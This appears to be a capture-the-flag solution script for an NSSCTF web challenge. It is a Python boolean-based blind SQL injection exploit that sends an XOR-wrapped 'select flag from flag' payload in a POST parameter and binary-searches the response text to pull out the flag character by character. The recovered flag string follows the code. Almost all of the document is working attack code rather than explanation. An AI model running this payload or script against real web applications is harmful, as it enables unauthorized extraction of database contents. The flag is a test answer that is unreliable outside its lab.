# 1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1
import requests
import time
url = "http://node2.anna.nssctf.cn:28140/index.php"
payload = "1^(ascii(substr((select(flag)from(flag)),{},1))>{})^1"
i = 0
mess_ok = "glzjin wants a girlfriend."
# mess_false = "not"
out = ""
while True:
i += 1
begin = 32
end = 128
tmp = (begin + end) // 2
while begin < end:
# url=url+p_dlen.format(i) 错误写法,url会一直增加
# res=requests.get(url)
# new_url = url + payload.format(i,chr(tmp))
new_url = url
data = {
"id": payload.format(i, tmp)
}
res = requests.post(new_url,data=data)
# print(res.text)
# print(new_url)
# print(begin,end,tmp)
if res.status_code == 429:
print("too fast")
time.sleep(0.5)
if mess_ok in res.text:
# print(i)
begin = tmp + 1
else:
end = tmp
tmp = (begin + end) // 2
# print(i)
if begin == 32 or end == 128:
break
out += chr(tmp)
print(out)
NSSCTF{b29f1060-322b-49af-8bb9-a90c4ff6c5a4}
|
wechat
alipay